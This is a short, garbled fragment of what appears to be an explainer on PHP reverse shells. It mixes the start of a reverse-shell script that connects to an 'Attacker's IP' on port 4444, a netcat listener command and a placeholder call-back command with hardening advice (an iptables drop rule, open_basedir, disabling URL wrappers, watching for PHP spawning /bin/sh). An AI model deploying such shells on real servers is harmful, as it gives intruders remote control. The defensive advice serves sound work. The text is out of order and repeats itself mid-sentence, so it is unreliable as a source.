<?php set_time_limit(0); $ip = '127.0.0.1'; // Attacker's IP $port = 4444; // Attacker's port $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { die("Error: $errstr ($errno)"); }
# With iptables iptables -A OUTPUT -p tcp --dport 4444 -j DROP Better: Only allow outbound HTTP/HTTPS and SMTP from the web server, and log everything else. open_basedir = /var/www/html:/tmp This prevents the script from accessing /etc/passwd or system binaries. 4. Disable URL-Aware Wrappers allow_url_fopen = Off allow_url_include = Off Blocks remote file inclusion (RFI) attacks. 5. Monitor for Suspicious PHP Processes Use auditd or Falco to detect PHP spawning /bin/sh : php-reverse-shell
nc -lvnp 4444 Compromised server (calling back): php -r '...reverse shell code...' Anatomy of php-reverse-shell.php Here’s a simplified version of what the script does (full versions add error handling, timeouts, and stream support): and stream support):